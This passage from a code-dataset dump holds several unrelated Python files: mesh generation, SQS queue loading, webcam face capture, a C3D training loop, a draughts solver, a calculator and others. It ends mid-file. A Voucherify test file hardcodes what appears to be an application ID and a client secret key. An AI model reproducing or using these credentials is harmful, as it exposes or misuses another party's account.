\t\t\t\t\t# lower level of body of rough fault\ny[3+ 2* (len(x_rough)-2) +2] = y_rough[len(x_rough)-1] -1.0 \t\t\t\t\t\t\t\t\t# lower center right corner\n\ny[3+ 2* (len(x_rough)-2) +3] = 0.0 \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t # lower left corner\ny[3+ 2* (len(x_rough)-2) +4] = 0.0 \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# lower 
right corner\n\n# np.savetxt('x_values.txt', x)\n# np.savetxt('y_values.txt', y)\nx= x*1000.0 # convert to km\ny=y*1000.0\t\t\t\t \n \n\n# working on the element part of dynosol 2d\n\nelement= np.zeros(len_arrays+2)\npj0=\tnp.zeros(len_arrays+2)\npj1=\tnp.zeros(len_arrays+2)\nboundary_flag= np.zeros(len_arrays+2)\n\n\n\n\n# left boundary from top to bottom ----------------------\npj0[0]= 0 \npj1[0]=2\nboundary_flag[0]= 1\n\npj0[1]= 2 \npj1[1]=3+len(x_rough)-2+ 1\nboundary_flag[1]= 1\n\npj0[2]=3+len(x_rough)-2+ 1\npj1[2]=3+ 2* (len(x_rough)-2) +3\nboundary_flag[2]= 1\n\n# Bottom boundary ----------------------\n\npj0[3]= 3+ 2* (len(x_rough)-2) +3\npj1[3]= 3+ 2* (len(x_rough)-2) +4\nboundary_flag[3]= 16\n\n# Right boundary from bottom to top----------------------\npj0[4]= 3+ 2* (len(x_rough)-2) +4\npj1[4]= 3+ 2* (len(x_rough)-2) +2\nboundary_flag[4]= 2\n\npj0[5]= 3+ 2* (len(x_rough)-2) +2\npj1[5]= 3+len(x_rough)-2\nboundary_flag[5]= 2\n\npj0[6]= 3+len(x_rough)-2\npj1[6]= 1\nboundary_flag[6]= 2\n\n# Top boundary ----------------------\npj0[7]= 1\npj1[7]= 0\nboundary_flag[7]= 32\n\n# Not a boundary-- Body segments -------------------\n\n\n\nfor ii in range(len(x_rough)-1):\n\tnext_value= 8+ ii\n\tpj0[8+ ii]= 2+ii\n\tpj1[8+ii] = 2+ii +1 \n\tboundary_flag[8+ii] = 0\n\nfor ii in range(len(x_rough)-1):\t\n\tpj0[next_value+1+ii] = 3+len(x_rough)-2+ 1 + ii\n\tpj1[next_value+1+ii] = 3+len(x_rough)-2+ 1 + ii +1\n\tboundary_flag[next_value+1+ii] = 0 \n\n\n#Write output\nf = open('coupling_input.poly','w')\n\n#need to write this part\n# npoints ndims 0 0\n# 13 2 0 0\nf.write('# input file for dynosol\\n')\nf.write('# \\n')\nf.write(\"{} {} {} {}\\n\".format( '#npoints' , 'ndims', '0', '0' ) )\nf.write(\"{} {} {} {}\\n\".format( len_arrays , 2, 0, 0 ) )\nf.write(\"{} {} {} \\n\".format( '#i' , 'xi', 'yi' ) )\nfor i in range(len_arrays):\n\n\tf.write(\"{} {:E} {:E}\\n\".format(i , x[i], y[i] ) ) \n\n## nsegments 1\n# 16 1\nf.write('# segments\\n')\nf.write(\"{} {}\\n\".format( '#nsegments' , '1' ) )\nf.write(\"{:d} {:d}\\n\".format( len_arrays+2 , 1 ) )\nf.write(\"{} {} {} {}\\n\".format( '#i' , 'pj0', 'pj1', 'boundary_flag' ) )\n\n\nfor i in range(len_arrays+2):\n\tpj_0= int ( pj0[i] )\n\tpj_1 =int ( pj1[i] )\n\tboundary= int( boundary_flag[i] )\n\tf.write(\"{} {:d} {:d} {:d}\\n\".format(i , pj_0, pj_1, boundary ) ) \n#f.write('# author='+author+'\\n')\n\nf.write('# #### holes, must be 0 ####\\n')\nf.write(\"{:d}\\n\".format( 0 ) )\n\nf.write('#### regions ####\\n')\nf.write('# nregions\\n')\nf.write( \"{}\\n\".format(3) )\nf.write(\"{} {} {} {}\\n\".format( '#k' , 'xk', 'yk', 'mattype', 'size' ) )\n\n# Working on the regions part --------------------------------------\n\n\nzones_1_x = 40000.0 \nzones_1_y= 10000.0\nelement_size_1= 400000.0\nelement_type_1= 0\n\nzones_2_x = 0.0\n#zones_2_x = x_rough[1] *1000 +500\nzones_2_y= 20100.0\n#zones_2_y = y_rough[1]*1000 +500.0\nelement_size_2 = 10000.0\nelement_type_2= 1\n\nzones_3_x = 40000.0\nzones_3_y= 30000.0\nelement_size_3= 400000.0\nelement_type_3= 0\n\nf.write(\"{} {:E} {:E} {:d} {:E}\\n\".format(0 , zones_1_x, zones_1_y, element_type_1, element_size_1 ) )\nf.write(\"{} {:E} {:E} {:d} {:E}\\n\".format(1 , zones_2_x, zones_2_y, element_type_2, element_size_2 ) )\nf.write(\"{} {:E} {:E} {:d} {:E}\\n\".format(2 , zones_3_x, zones_3_y ,element_type_3, element_size_3) 
)\n\nf.close()\n\n\n\n\n\n\n","sub_path":"examples/input_file_script.py","file_name":"input_file_script.py","file_ext":"py","file_size_in_byte":5202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"528197482","text":"#\n# (c) UWA, The University of Western Australia\n# M468/35 Stirling Hwy\n# Perth WA 6009\n# Australia\n#\n# Copyright by UWA, 2012-2015\n# All rights reserved\n#\n# This library is free software; you can redistribute it and/or\n# modify it under the terms of the GNU Lesser General Public\n# License as published by the Free Software Foundation; either\n# version 2.1 of the License, or (at your option) any later version.\n#\n# This library is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU\n# Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public\n# License along with this library; if not, write to the Free Software\n# Foundation, Inc., 59 Temple Place, Suite 330, Boston,\n# MA 02111-1307 USA\n#\n\"\"\"\nPopulate the queue\n\"\"\"\nimport multiprocessing\nfrom helpers.logging_helper import use_multiprocessor_logging, get_logger\nfrom helpers.multiprocessing_helper import Consumer\n\nuse_multiprocessor_logging()\n\nimport argparse\nimport sys\nfrom boto.sqs.message import Message\nfrom helpers.sqs_helper import SqsHelper\n\nLOG = get_logger(__name__)\nLOG.info('PYTHONPATH = {0}'.format(sys.path))\n\nNUMBER_PROCESSES = 10\nSEGMENT = 100000 / NUMBER_PROCESSES\n\n\nclass TaskAdd(object):\n def __init__(self, range_id, args):\n self.range_id = range_id\n self.args = args\n\n def __call__(self):\n # noinspection PyBroadException\n try:\n sqs_helper = SqsHelper('us-east-1')\n queue = sqs_helper.get_queue(self.args.queue_name)\n\n for galaxy_id in range(self.range_id * SEGMENT, (self.range_id * SEGMENT) + SEGMENT):\n if self.args.verbosity >= 1 or galaxy_id % 100 == 0:\n LOG.info('Adding {0}'.format(galaxy_id))\n\n message = Message()\n message.set_body('{0}'.format(galaxy_id))\n queue.write(message)\n\n except Exception:\n LOG.exception('Task died')\n\n def __str__(self):\n return 'Adding {0}'.format(self.range_id)\n\n\ndef add_ids_to_queue(args):\n # Create the queue\n queue = multiprocessing.JoinableQueue()\n\n consumers = [Consumer(queue)\n for i in xrange(NUMBER_PROCESSES)]\n\n for consumer in consumers:\n consumer.start()\n\n if args.verbosity >= 1:\n LOG.info('Adding elements')\n\n for range_id in range(0, NUMBER_PROCESSES):\n queue.put(TaskAdd(range_id, args))\n\n # Add a poison pill for each consumer\n for i in xrange(NUMBER_PROCESSES):\n queue.put(None)\n\n # Wait for the queue to terminate\n queue.join()\n\n\ndef main():\n parser = argparse.ArgumentParser('Add galaxy ids to the queue')\n parser.add_argument(\n \"-v\",\n \"--verbosity\",\n action=\"count\",\n default=0,\n help=\"increase output verbosity\")\n parser.add_argument('queue_name', help='the queue to load')\n args = parser.parse_args()\n add_ids_to_queue(args)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"src/add_galaxy_ids_to_queue.py","file_name":"add_galaxy_ids_to_queue.py","file_ext":"py","file_size_in_byte":3145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"344605608","text":"import sys\nimport numpy as np\nimport PDB_tools\n\nif __name__ == '__main__':\n data = np.array([])\n reader = 
PDB_tools.PDBreader(sys.argv[1])\n data = reader.getdata()\n posi = PDB_tools.Calc_data(data)\n positions = np.array([])\n positions = posi.getpositions()\n\n one_position = np.array([])\n ans = np.array([])\n counter = 0\n tmp = 0\n for i in range(len(data)):\n l = data[i].split()\n if l[0] == \"ATOM\":\n if int(l[1]) - tmp < 1 or i == len(data)-2:\n print(l[1],tmp)\n one_position = np.reshape(one_position,(int(tmp),3))\n calc = PDB_tools.Calc_data(one_position)\n ans = calc.calc_centerpositions()\n print(ans)\n one_position = np.array([])\n one_position = np.append(one_position,positions[counter])\n counter += 1\n tmp = int(l[1])\n\n #print(one_position)\n","sub_path":"cal_centerposition.py","file_name":"cal_centerposition.py","file_ext":"py","file_size_in_byte":929,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"446908508","text":"import cv2\nimport sys\n\n\nwebcam = cv2.VideoCapture(0) #Use camera 0\nface = cv2.CascadeClassifier('train_face.xml')\n\nwhile True:\n ret,frame = webcam.read()\n\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n faces = face.detectMultiScale(frame,1.3,5)\n padding = 10\n\n for (x, y, w, h) in faces:\n cv2.rectangle(frame,(x-padding, y-padding), (x+w+padding, y+h+padding), (255, 0, 0), 2)\n sub_face = frame[y:y+h+padding, x:x+w+padding]\n #sub_face = cv2.cvtColor(sub_face, cv2.COLOR_BGR2GRAY)\n FaceFileName = \"facesCapture/face_\" + str(y) + \".jpg\"\n cv2.imwrite(FaceFileName,sub_face)\n cv2.imshow(\"Detecting and storing face\",frame)\n if cv2.waitKey(1)== ord('q'):\n break\nwebcam.release()\ncv2.destroyAllWindows()\n\n\n\n \n","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"415128550","text":"import time\nimport numpy as np\nfrom pyquaternion import Quaternion\n\n\ndef tf(position):\n pos, orn = position\n pos = np.array(pos)\n if not isinstance(orn, Quaternion):\n orn = Quaternion(orn[3], *orn[:3])\n return pos, orn\n\n\nclass KinematicConstraint(object):\n def __init__(self, base_position, child_position):\n base_pos, base_orn = tf(base_position)\n child_pos, child_orn = tf(child_position)\n pos = base_orn.inverse.rotate(child_pos - base_pos)\n orn = base_orn.inverse * child_orn\n self._constraint = pos, orn\n\n def get_child(self, base_position):\n base_pos, base_orn = tf(base_position)\n pos, orn = self._constraint\n pos = base_pos + base_orn.rotate(pos)\n orn = base_orn * orn\n return pos, orn\n\n\nclass Rate(object):\n def __init__(self, time_step):\n self._time_step = time_step\n self._next_time = time.time() + time_step\n\n def sleep(self):\n t = time.time()\n if t < self._next_time:\n time.sleep(self._next_time - t)\n else:\n time.sleep(1e-6)\n self._next_time += self._time_step","sub_path":"mime/agent/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"478720487","text":"import argparse\nimport os\nimport shutil\nimport logging\nimport time\nimport pickle\nimport random\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.utils.data as data\nimport torchvision.transforms as transforms\nimport torchvision.datasets as datasets\nfrom models import MySTCNN, MyC3D\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom utils import AverageMeter, accuracy, Bar\n\nparser = 
argparse.ArgumentParser()\n\n# datasets\nparser.add_argument('-d', '--dataset', default='casme2', type=str)\n# parser.add_argument('--dataset-path', default='dataset/CASME2_224_15frames.pickle')\nparser.add_argument('--dataset-path', default='dataset/CASME2_BGR_224_15frames.pickle')\nparser.add_argument('-f', '--folds', default=10, type=int, help='k-folds cross validation')\n\n# optimization options\nparser.add_argument('--epochs', default=20, type=int, metavar='N',\n help='number of total epochs to run')\nparser.add_argument('--start-epoch', default=0, type=int, metavar='N',\n help='manual epoch number (useful on restarts)')\nparser.add_argument('--train_batch', default=2, type=int, metavar='N',\n help='train batchsize')\nparser.add_argument('--test-batch', default=2, type=int, metavar='N',\n help='test batchsize')\nparser.add_argument('--lr', '--learning-rate', default=0.0001, type=float,\n metavar='LR', help='initial learning rate')\nparser.add_argument('--drop', '--dropout', default=0, type=float,\n metavar='Dropout', help='Dropout ratio')\nparser.add_argument('--schedule', type=int, nargs='+', default=[20, 30, 40],\n help='Decrease learning rate at these epochs.')\nparser.add_argument('--gamma', type=float, default=0.90, help='LR is multiplied by gamma on schedule.')\nparser.add_argument('--momentum', default=0.8, type=float, metavar='M',\n help='momentum')\nparser.add_argument('--weight-decay', '--wd', default=1e-3, type=float,\n metavar='W', help='weight decay (default: 1e-4)')\n\n# checkpoints\nparser.add_argument('-c', '--checkpoint', default='checkpoints/casme2_c3d', type=str, metavar='PATH',\n help='path to save checkpoint (default:checkpoint)')\nparser.add_argument('--resume', default='', type=str, metavar='PATH')\n\n# architecture\nparser.add_argument('--arch', '-a', metavar='ARCH', default='c3d')\n\n# miscs\nparser.add_argument('--manualSeed', type=int, help='manual seed')\n\nargs = parser.parse_args()\nstate = {k: v for k, v in args._get_kwargs()}\n\n# use CUDA\nuse_cuda = torch.cuda.is_available()\n\n# Random seed\nif args.manualSeed is None:\n args.manualSeed = random.randint(1, 10000)\nrandom.seed(args.manualSeed)\ntorch.manual_seed(args.manualSeed)\nif use_cuda:\n torch.cuda.manual_seed_all(args.manualSeed)\n\nbest_acc = 0 # best test accuracy\n\ndef main():\n global best_acc\n start_epoch = args.start_epoch\n\n # 创建 checkpoint 目录\n if not os.path.isdir(args.checkpoint):\n os.makedirs(args.checkpoint)\n\n # load data\n print('==> Preparing dataset %s' % args.dataset)\n with open(args.dataset_path, 'rb') as f:\n data = pickle.load(f)\n\n # model\n # print(\"==> creating model '{}'\".format(args.arch))\n model = MyC3D(with_classifier=True, num_classes=5)\n if use_cuda:\n model = model.cuda()\n\n # criterion\n criterion = nn.CrossEntropyLoss()\n\n # optimizer\n optimizer = optim.SGD(model.parameters(), lr=args.lr, momentum=args.momentum, weight_decay=args.weight_decay)\n\n # set up logging\n logging.basicConfig(level=logging.DEBUG,\n filename=os.path.join(args.checkpoint, 'log_info.log'),\n filemode='a+',\n format=\"%(asctime)-15s %(levelname)-8s %(message)s\")\n \n # log configuration\n logging.info('-' * 10 + 'configuration' + '*' * 10)\n for arg in vars(args):\n logging.info((arg, str(getattr(args, arg))))\n\n # 10-fold cv\n acc_fold = []\n reset_lr = state['lr']\n for f_num in range(args.folds):\n state['lr'] = reset_lr\n\n # model\n model = MyC3D(with_classifier=True, num_classes=5)\n if use_cuda:\n model = model.cuda()\n model.reset_all_weights()\n optimizer = 
optim.SGD(model.parameters(), lr=args.lr, momentum=args.momentum, weight_decay=args.weight_decay)\n\n average_acc = 0\n best_acc = 0\n\n # prepare input\n train_img, train_label, test_img, test_label = data[f_num]['train_img'], data[f_num]['train_label'], data[f_num]['test_img'], data[f_num]['test_label']\n\n train_img = torch.tensor(train_img, dtype=torch.float) / 255.0 # (b_s, frames, h, w)\n train_img = train_img.permute(0, 4, 1, 2, 3)\n # train_img = train_img.unsqueeze(1)\n\n test_img = torch.tensor(test_img, dtype=torch.float) / 255.0\n test_img = test_img.permute(0, 4, 1, 2, 3)\n # test_img = test_img.unsqueeze(1)\n\n train_label, test_label = torch.tensor(train_label, dtype=torch.long), torch.tensor(test_label, dtype=torch.long)\n\n train_dataset = torch.utils.data.TensorDataset(train_img, train_label)\n train_iter = torch.utils.data.DataLoader(\n dataset=train_dataset,\n batch_size=args.train_batch,\n shuffle=True\n )\n\n test_dataset = torch.utils.data.TensorDataset(test_img, test_label)\n test_iter = torch.utils.data.DataLoader(\n dataset=test_dataset,\n batch_size=args.test_batch,\n shuffle=False\n )\n # train and val\n for epoch in range(start_epoch, args.epochs):\n # 在特定的epoch 调整学习率\n adjust_learning_rate(optimizer, epoch)\n\n print('\\nEpoch: [%d | %d] LR: %f' % (epoch + 1, args.epochs, optimizer.param_groups[0]['lr']))\n \n train_loss, train_acc = train(train_iter, model, criterion, optimizer, epoch, use_cuda)\n test_loss, test_acc = test(test_iter, model, criterion, epoch, use_cuda)\n\n # logger\n\n # save model\n is_best = test_acc > best_acc\n best_acc = max(test_acc, best_acc)\n save_checkpoint({\n 'epoch': epoch + 1,\n 'state_dict': model.state_dict(),\n 'acc': test_acc,\n 'best_acc': best_acc,\n 'optimizer' : optimizer.state_dict(),\n }, is_best, f_num, checkpoint=args.checkpoint)\n \n # compute average acc\n acc_fold.append(best_acc)\n average_acc = sum(acc_fold) / len(acc_fold)\n\n logging.info('fold: %d, best_acc: %.2f, average_acc: %.2f' % (f_num, best_acc, average_acc))\n \n\n\ndef train(train_iter, model, criterion, optimizer, epoch, user_cuda):\n # switch to train mode\n model.train()\n\n batch_time = AverageMeter()\n data_time = AverageMeter()\n losses = AverageMeter()\n top1 = AverageMeter()\n top5 = AverageMeter()\n end = time.time()\n\n bar = Bar('Processing', max=len(train_iter))\n for batch_idx, (inputs, targets) in enumerate(train_iter):\n # measure data loading time\n data_time.update(time.time() - end)\n\n if use_cuda:\n inputs, targets = inputs.cuda(), targets.cuda()\n \n # compute output\n per_outputs = model(inputs)\n\n per_loss = criterion(per_outputs, targets)\n\n loss = per_loss\n\n # measure accuracy and record loss\n prec = accuracy(per_outputs.data, targets.data, topk=(1,))\n losses.update(loss.item(), inputs.size(0))\n top1.update(prec[0].item(), inputs.size(0))\n\n # compute gradient and do SGD step\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n # measure elapsed time\n batch_time.update(time.time() - end)\n end = time.time()\n\n # plot progress\n bar.suffix = '({batch}/{size}) Data: {data:.3f}s | Batch: {bt:.3f}s | Total: {total:} | ETA: {eta:} | Loss: {loss:.4f} | top1: {top1: .4f}'.format(\n batch=batch_idx+1,\n size=len(inputs),\n data=data_time.avg,\n bt=batch_time.avg,\n total=bar.elapsed_td,\n eta=bar.eta_td,\n loss=losses.avg,\n top1=top1.avg,\n )\n bar.next()\n bar.finish()\n return (losses.avg, top1.avg)\n\ndef test(test_iter, model, criterion, epoch, use_cuda):\n global best_acc\n\n batch_time = AverageMeter()\n 
data_time = AverageMeter()\n losses = AverageMeter()\n top1 = AverageMeter()\n top5 = AverageMeter()\n\n # switch to evaluate mode\n model.eval()\n\n end = time.time()\n bar = Bar('Processing', max=len(test_iter))\n for batch_idx, (inputs, targets) in enumerate(test_iter):\n # measure data loading time\n data_time.update(time.time() - end)\n\n if use_cuda:\n inputs, targets = inputs.cuda(), targets.cuda()\n # inputs, targets = torch.autograd.Variable(inputs, volatile=True), torch.autograd.Variable(targets)\n\n # compute output\n outputs = model(inputs)\n loss = criterion(outputs, targets)\n\n \"\"\"\n np_inputs = inputs.numpy()\n np_att = attention.numpy()\n for item_in, item_att in zip(np_inputs, np_att):\n print(item_in.shape, item_att.shape)\n \"\"\"\n\n # measure accuracy and record loss\n prec = accuracy(outputs.data, targets.data, topk=(1,))\n losses.update(loss.item(), inputs.size(0))\n top1.update(prec[0].item(), inputs.size(0))\n\n # measure elapsed time\n batch_time.update(time.time() - end)\n end = time.time()\n\n # plot progress\n bar.suffix = '({batch}/{size}) Data: {data:.3f}s | Batch: {bt:.3f}s | Total: {total:} | ETA: {eta:} | Loss: {loss:.4f} | top1: {top1: .4f}'.format(\n batch=batch_idx+1,\n size=len(inputs),\n data=data_time.avg,\n bt=batch_time.avg,\n total=bar.elapsed_td,\n eta=bar.eta_td,\n loss=losses.avg,\n top1=top1.avg,\n )\n bar.next()\n bar.finish()\n return (losses.avg, top1.avg)\n\ndef save_checkpoint(state, is_best, f_num, checkpoint='checkpoint', filename='checkpoint.pth.tar'):\n filepath = os.path.join(checkpoint, 'fold_' + str(f_num) + '_' + filename)\n torch.save(state, filepath)\n if is_best:\n shutil.copyfile(filepath, os.path.join(checkpoint, 'fold_' + str(f_num) + '_model_best.pth.tar'))\n\n\ndef adjust_learning_rate(optimizer, epoch):\n global state\n if epoch in args.schedule:\n state['lr'] *= args.gamma\n for param_group in optimizer.param_groups:\n param_group['lr'] *= args.gamma\n\n\nif __name__ == '__main__':\n main()","sub_path":"casme2_c3d.py","file_name":"casme2_c3d.py","file_ext":"py","file_size_in_byte":10895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"152846897","text":"\n\ndef find_white(board):\n for i in range(8):\n for j in range(8):\n if board[i][j] == \"o\":\n return [i, j]\ndef check_move(oboard, white ,dir):\n board = oboard\n wcol = white[1]\n wrow = white[0]\n list_b = []\n\n #left\n if dir == 0:\n if wcol!= 0:\n done = False\n for i in range(wcol - 1, -1, -1):\n interested = board[wrow][i]\n if not done:\n if interested == 'x':\n if i != 0:\n for j in range(i - 1, -1, -1):\n if board[wrow][j] == '.':\n list_b.append([wrow, j])\n elif board[wrow][j] == 'x':\n done = True\n break\n else:\n break\n\n #top\n elif dir == 1:\n if wrow!=0:\n done = False\n for i in range(wrow - 1, -1, -1):\n interested = board[i][wcol]\n if not done:\n if interested == 'x':\n if i != 0:\n for j in range(i - 1, -1, -1):\n if board[j][wcol] == '.':\n list_b.append([j, wcol])\n elif board[j][wcol] == 'x':\n done = True\n break\n else:\n break\n #right\n elif dir == 2:\n if wcol != 7:\n done = False\n for i in range(wcol+1, 8):\n interested = board[wrow][i]\n if not done:\n if interested == 'x':\n if i != 7:\n for j in range(i + 1, 8):\n if board[wrow][j] == '.':\n list_b.append([wrow, j])\n elif board[wrow][j] == 'x':\n done = True\n break\n else:\n break\n #down\n elif dir == 3:\n if wrow != 7:\n done = False\n for i in range(wrow + 1, 8):\n interested = board[i][wcol]\n if not done:\n if 
interested == 'x':\n if i != 7:\n for j in range(i + 1, 8):\n if board[j][wcol] == '.':\n list_b.append([j, wcol])\n elif board[j][wcol] == 'x':\n done = True\n break\n else:\n break\n return list_b\n\ndef check_move2(board, white):\n list_b = []\n wcol = white[1]\n wrow = white[0]\n #left\n if wcol > 1:\n if board[wrow][wcol-1] == 'x':\n if board[wrow][wcol-2] == '.':\n list_b.append([wrow, wcol-2])\n #top\n if wrow > 1:\n if board[wrow - 1][wcol] == 'x':\n if board[wrow - 2][wcol] == '.':\n list_b.append([wrow - 2, wcol])\n\n #right\n if wcol < 6:\n if board[wrow][wcol + 1] == 'x':\n if board[wrow][wcol + 2] == '.':\n list_b.append([wrow, wcol + 2])\n\n return list_b\n\n\n\n\ndef validmoves(board, king, eat, last):\n pos = find_white(board)\n tmoves = []\n if king:\n if not eat:\n for i in range(4):\n moves = check_move(board,pos, i)\n for j in moves:\n tmoves.append(j)\n if eat:\n for i in range(4):\n if i != last:\n moves = check_move(board, pos, i)\n for j in moves:\n tmoves.append(j)\n else:\n tmoves = check_move2(board,pos)\n\n return tmoves\ndef which_dir(old, new):\n if new[0] - old[0] == 0:\n if new[1] - old[1] > 0:\n return 0\n elif new[1] - old[1] < 0:\n return 2\n elif new[0] - old[0] > 0:\n return 1\n elif new[0] - old[0] <0:\n return 3\n\ndef win(board):\n for i in range(8):\n for j in range(8):\n if board[i][j] == 'x':\n return False\n return True\ndef del_black(oboard, origin, target):\n board = oboard[:]\n if target[0] - origin[0] == 0:\n if target[1] - origin[1] > 0:\n for i in range(origin[1]+1, target[1]):\n if board[origin[0]][i] == 'x':\n board[origin[0]] = list(board[origin[0]])\n board[origin[0]][i] = '.'\n board[origin[0]] = ''.join(board[origin[0]])\n elif target[1] - origin[1] < 0:\n for i in range(target[1] + 1, origin[1]):\n if board[origin[0]][i] == 'x':\n board[origin[0]] = list(board[origin[0]])\n board[origin[0]][i] = '.'\n board[origin[0]] = ''.join(board[origin[0]])\n\n elif target[1] - origin[1] == 0:\n if target[0] - origin[0] > 0:\n for i in range(origin[0] + 1, target[0]):\n if board[i][origin[1]] == 'x':\n board[i] = list(board[i])\n board[i][origin[1]] = '.'\n board[i] = ''.join(board[i])\n\n elif target[0] - origin[0] < 0:\n\n for i in range(target[0] + 1, origin[0]):\n if board[i][origin[1]] == 'x':\n board[i] = list(board[i])\n board[i][origin[1]] = '.'\n board[i] = ''.join(board[i])\n\n return board\ndef print_board(board):\n for i in range(8):\n for j in range(8):\n print(board[i][j], end=' ')\n print()\n\ndef move_the_white(oboard, old, last, king):\n board = oboard\n if win(board):\n return 1\n\n wpos = find_white(board)\n moves = []\n #print(old, end='--')\n #print(wpos, end = ':')\n\n if wpos[0] == 0:\n king = True\n\n\n if last != None:\n moves = validmoves(board, king, True, last)\n else:\n moves = validmoves(board, king, False, last)\n\n if len(moves) == 0:\n #print(\"o\")\n return 0\n\n total_i_dim = 0\n #print(moves)\n #print()\n for i in range(len(moves)):\n new_board = board[:]\n new_move = moves[i]\n\n new_board = del_black(new_board, wpos, new_move)\n new_board[wpos[0]] = list(new_board[wpos[0]])\n new_board[wpos[0]][wpos[1]] = '.'\n new_board[wpos[0]] = ''.join(new_board[wpos[0]])\n\n new_board[new_move[0]] = list(new_board[new_move[0]])\n new_board[new_move[0]][new_move[1]] = 'o'\n new_board[new_move[0]] = ''.join(new_board[new_move[0]])\n #print_board(new_board)\n\n last = which_dir(wpos, new_move)\n total_i_dim += move_the_white(new_board, wpos, last, king)\n\n\n return total_i_dim\n\ncases = int(input())\nfor case in 
range(cases):\n    board = []\n    for i in range(8):\n        row = input()\n        board.append(row)\n    if case+1 != cases:\n        blank = input()\n    wpos = find_white(board)\n    a = None\n    total = move_the_white(board, wpos, a, False)\n    print(total)","sub_path":"draughts.py","file_name":"draughts.py","file_ext":"py","file_size_in_byte":7269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"584611983","text":"from heapq import heappush, heappop\nfrom collections import deque\n\n\nclass Solution:\n    def rearrangeString(self, words, k):\n        \"\"\"\n        Time complexity:\n        The time complexity of the above algorithm is O(N*logN) where ‘N’\n        is the number of characters in the input string.\n\n        Space complexity:\n        The space complexity will be O(N), as in the worst case, we need to\n        store all the ‘N’ characters in the HashMap.\n        \"\"\"\n\n        if k <= 1:\n            return words\n\n        charFrequencyMap = {}\n        for char in words:\n            charFrequencyMap[char] = charFrequencyMap.get(char, 0) + 1\n\n        maxHeap = []\n        # add all characters to the max heap\n        for char, frequency in charFrequencyMap.items():\n            heappush(maxHeap, (-frequency, char))\n\n        queue = deque()\n        resultString = []\n        while maxHeap:\n            frequency, char = heappop(maxHeap)\n            # append the current character to the result string and decrement its count\n            resultString.append(char)\n            # decrement the frequency and append to the queue\n            queue.append((char, frequency+1))\n            if len(queue) == k:\n                char, frequency = queue.popleft()\n                if -frequency > 0:\n                    heappush(maxHeap, (frequency, char))\n\n        # if we were successful in appending all the characters to the result string, return it\n        return ''.join(resultString) if len(resultString) == len(words) else \"\"\n","sub_path":"Problems/Leetcode/358_RearrangeStringkDistanceApart.py","file_name":"358_RearrangeStringkDistanceApart.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"82666637","text":"from voucherify import Client as voucherifyClient\n\nvoucherify = voucherifyClient(\n    application_id=\"c70a6f00-cf91-4756-9df5-47628850002b\",\n    client_secret_key=\"3266b9f8-e246-4f79-bdf0-833929b1380c\"\n)\n\ntracking_id = 'PythonTestUser'\ntestVoucher = {\n    \"code\": \"PythonVoucherTest\",\n    \"discount\": {\n        \"type\": \"AMOUNT\",\n        \"amount_off\": 12436\n    },\n    \"category\": \"PythonTestCategory\",\n    \"start_date\": \"2016-01-01T00:00:00Z\",\n    \"expiration_date\": None,\n    \"redemption\": {\n        \"quantity\": None,\n        \"redeemed_quantity\": 0\n    },\n    \"active\": True\n}\n\n\ndef test_publishVoucher():\n    params = {\n        \"channel\": \"Email\",\n        \"customer\": \"donny.roll@mail.com\"\n    }\n    result = voucherify.distributions.publish(params)\n    assert result.get('active') is True\n    assert result.get('type') == 'DISCOUNT_VOUCHER'\n","sub_path":"tests/test_distributions_e2e.py","file_name":"test_distributions_e2e.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"479014047","text":"import re\nfrom tkinter import *\n\ndef handle_x(x):\n    a = re.split(r'[\\+\\-\\*\\/\\(\\)]', x)\n    b = re.findall(r'[\\+\\-\\*\\/\\(\\)]', x)\n    t = [rv for r in zip(a, b) for rv in r]\n    t = list(filter(lambda x: x != '', t))\n    if len(a) > len(b):\n        t.append(a[len(a) - 1])\n    else:\n        t.append(b[len(b) - 1])\n    return t\n\nclass Stack:\n    def __init__(self):\n        self.items = []\n\n    def isEmpty(self):\n        return self.items == []\n\n    def push(self, item):\n        self.items.append(item)\n\n    def 
pop(self):\n return self.items.pop()\n\n def peek(self):\n return self.items[len(self.items) - 1]\n\n def size(self):\n return len(self.items)\n\ndef postfix(a):\n x={}\n x['*']=3;x['/']=3;x['+']=2;x['-']=2;x['(']=1\n opstack=Stack()\n poststack=[]\n tokenlist=handle_x(a)\n print(tokenlist)\n for token in tokenlist:\n if re.match(r'\\d+',token):\n poststack.append(token)\n elif token == '(':\n opstack.push(token)\n elif token == ')':\n toptoken=opstack.pop()\n while toptoken != '(':\n poststack.append(toptoken)\n toptoken = opstack.pop()\n else:\n while (not opstack.isEmpty()) and (x[opstack.peek()]>=x[token]):\n poststack.append(opstack.pop())\n opstack.push(token)\n while not opstack.isEmpty():\n poststack.append(opstack.pop())\n return poststack\n\ndef calcu(a):\n realstack=Stack()\n for i in a:\n if re.match(r'\\d+', i):\n realstack.push(i)\n elif i == '+':\n t1=realstack.pop()\n t2=realstack.pop()\n realstack.push(int(t2)+int(t1))\n elif i == '-':\n t1 = realstack.pop()\n t2 = realstack.pop()\n 